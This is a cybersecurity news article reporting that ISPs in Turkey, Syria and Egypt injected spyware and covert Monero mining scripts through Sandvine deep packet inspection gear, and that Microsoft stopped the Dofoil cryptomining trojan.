ISPs Caught Deploying the Cryptocurrency Mining Malware

Cryptocurrencies are booming lately! And that’s something very easy to get since they provide the users with a variety of benefits including the absence of middleman during transactions, and the anonymity of deals.

This is why it is more and more common to see people making use of trading, although without a doubt this also brings with it some traps arranged. It is so that the main concerns now are not only hackers or dodgy websites, but also care must be taken of even government entities. Like the case of ISPs (Internet Service Providers) who have been recently discovered injecting mining malware — and like it wasn’t enough they are doing it in collaboration with governments and federal agencies.

Syria, Egypt, and Turkey Fingered

Most of the research has located these malicious actions in countries like Turkey, Syria, and Egypt. The discoveries have shown that while Turkish and Syrian internet providers have been injecting some secret surveillance malware; in Egypt, they have done it by using related tech but injecting mining malware on browsers.

The reports concluded these countries are using Sandvine technologies such as “Deep Packet Inspections,” a malware that allows them (ISPs) manipulating and intercepting the traffic generated by end users. This packet by packet technology is so well-elaborated that permit a spectrum of options like prioritizing, degrading, blocking, injecting and logging diverse types of traffic on the web.

Subsequently, we can see so many different levels at the malware mining injection. On one hand we have Turkey’s Telecom network using devices from Sandvine PacketLogic, with the intention of relocating users of interest to infected web pages and spy software; and in the same way we can see Syrians doing similar actions, but taking the users to malicious versions of antivirus that contain malware created by the government, instead.

But without a doubt, telecoms operators in Egypt are the winners when it comes to using technology to its benefit. They have been injecting mining scripts into every web page users visit, but of course, maintaining this action always hidden.

A Citizen lab research inferred the internet providers might be using a scheme denominated “Adhose,” a technology that raises money through mining the anonymous Altcoin Monero in a covert manner.

A battle won by Microsoft

Last week, cybersecurity experts at Microsoft were able to stop a massive mining malware outbreak. Researchers discovered the amazingly fast-spreading Trojan traveling around Russia, Turkey and Ukraine; a feat that has affected an incredible amount of half a million people.

The malware product is dubbed as “Dofoil” and equipped with a crypto mining payload designed to abduct the hardware of victims and mine it with the cryptocurrency “Electroneum.”

Microsoft stated at the malware shoot that it was because of the increasing value of the cryptocurrencies like Bitcoin that malware operators are taking a shot at elaborating attacks with mining components included. A great example of this is the latest presence of coin miners in replacement of ransomware, so scammers are adding coin mining scripts and misleading people to fake tech support pages.

Consequently, this incident is a worrying issue raised in the recent era, as it is clear now that not only we need to be worried about hackers and cybercriminals, but also of the government. And the outlook is even worse for those who do not have another option than using the Egyptian internet services since they will have to face the government trying to mine their computers as well.

Ali Qamar is a privacy, blockchain and cybersecurity enthusiast, his work has been featured in many major tech and security blogs including InfosecInstitute, Hackread, ValueWalk, Cryptodaily, Intego, and SecurityAffairs to name a few. He runs SpyAdvice.com currently. Follow Ali on Twitter @AliQammar57